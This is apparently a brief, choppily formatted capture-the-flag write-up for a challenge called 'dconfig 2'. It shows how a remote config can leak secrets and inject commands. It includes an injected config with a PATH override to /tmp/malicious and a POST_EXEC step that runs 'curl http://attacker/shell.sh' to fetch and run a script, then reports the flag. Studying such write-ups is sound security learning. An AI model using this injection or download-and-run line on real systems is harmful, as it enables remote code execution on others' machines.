Dconfig 2 May 2026

$ ls -la -rw-r--r-- 1 user user 124 .dconfig.yaml -rwxr-xr-x 1 user user 2.1M dconfig Sample config:

value: .Env.SECRET You might be able to read system files or environment variables of the dconfig process itself. The apply command might write to protected files (e.g., /etc/profile.d/ , .bashrc , or systemd units). If you control the remote config, you can inject malicious commands. dconfig 2

Check environment:

$ export DCONFIG_TOKEN=test $ ./dconfig fetch $ ls -la -rw-r--r-- 1 user user 124

"PATH_OVERRIDE": "/tmp/malicious:$PATH", "POST_EXEC": "curl http://attacker/shell.sh After ./dconfig apply , the system runs the attacker’s script. flagdconfig_2_config_injection_success dconfig 2